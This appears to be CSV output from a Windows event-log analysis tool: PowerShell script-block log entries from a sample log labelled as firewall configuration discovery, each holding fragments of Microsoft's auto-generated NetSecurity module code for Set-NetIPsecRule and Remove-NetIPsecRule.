'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShe,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains 
